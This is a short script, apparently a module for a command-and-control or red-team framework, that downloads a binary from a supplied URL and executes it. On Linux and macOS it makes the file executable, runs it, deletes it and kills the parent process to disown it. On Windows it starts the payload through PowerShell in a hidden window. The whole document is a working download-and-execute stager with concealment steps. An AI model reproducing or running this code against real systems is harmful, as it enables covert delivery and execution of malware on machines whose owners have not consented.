def get_parent_process(process_name):
    for cur_proc in process.list():
        if process_name == cur_proc['name']:
            return cur_proc['ppid']

def download_and_execute(url):
    if sys.is_linux() or sys.is_macos():
        # Download
        http.download(url, "./tmp.elf")
        sys.shell("chmod +x ./tmp.elf")
        # Execute
        sys.exec("./tmp.elf", [], True)
        # Cleanup
        file.remove("./tmp.elf")
        # Kill parent process for clean disown
        ppid = get_parent_process('tmp.elf')
        if ppid != '1':
            process.kill(ppid)

    elif sys.is_windows():
        http.download(url, "./tmp.exe")
        sys.exec("powershell.exe", ["Start-Process -WindowStyle hidden ./tmp.exe"])

    else:
        eprint("OS not supported")
        return

download_and_execute(input_params['url'])
